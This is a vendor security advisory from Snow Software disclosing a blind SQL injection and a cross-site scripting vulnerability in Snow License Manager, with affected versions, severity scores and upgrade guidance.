Snow Software recently detected two vulnerabilities impacting Snow License Manager (SLM) as part of our regular penetration testing of our products. At this time, Snow does not believe that either vulnerability has been exploited or that data has been exposed.
 

The first vulnerability is a blind SQL injection (CVE-2023-3864 ), which affects SLM On-Premises (also known as SLM Enterprise) and Service Provider Edition (SPE) from version 8.0.0 up to and including 9.30.1. This has a CVSS score of 7.2 and is rated a high severity vulnerability.
 

We also found a second vulnerability (CVE-2023-3937 ) which allows cross-site scripting. This is found in version 9.30.1 and earlier in both SLM On-Premises and SLM on SPE. This has a CVSS score of 4.8 and is rated as a medium severity vulnerability.
 

Snow strongly recommends that all On-Premises customers with Snow License Manager 9.30.1 and earlier upgrade immediately. SPE customers should reach out to their Partner or Service Provider to discuss a mitigation plan. SPE partners have already been informed.
 

Description

During a routine penetration test conducted by our third-party security consultants, a SQL injection vulnerability was discovered in SLM On-Premises. When investigated further by our product security teams, it was determined that the vulnerability also impacted SLM for SPE.
 

If exploited, an SLM administrative user who is logged in with high level privileges could use the web portal to trigger a SQL injection that would allow them to access, modify, or delete data in a database potentially impinging on the confidentiality, integrity or availability of the system. This is limited to impacting the SQL database and does not allow a scope change.
 

The second vulnerability, if exploited, allows a network user who is logged in with high level privileges to trigger a cross-site scripting attack that could potentially impact the confidentiality or integrity of the web portal. This does require user interaction to be triggered.
 

Remediation

For SLM On-Premises, customers are encouraged to upgrade to SLM v9.30.2 or later releases. If you currently have automatic updates through the Snow Update Service, please check to ensure that the upgrade has been completed.
 

For customers with SLM on SPE, your partners have already been notified and we’ve provided remediation guidance accordingly. Feel free to reach out to your partner for further information.
 

If you have any questions, please raise a ticket with Snow Support. Additional updates or information regarding this security update will be shared in this thread, if needed.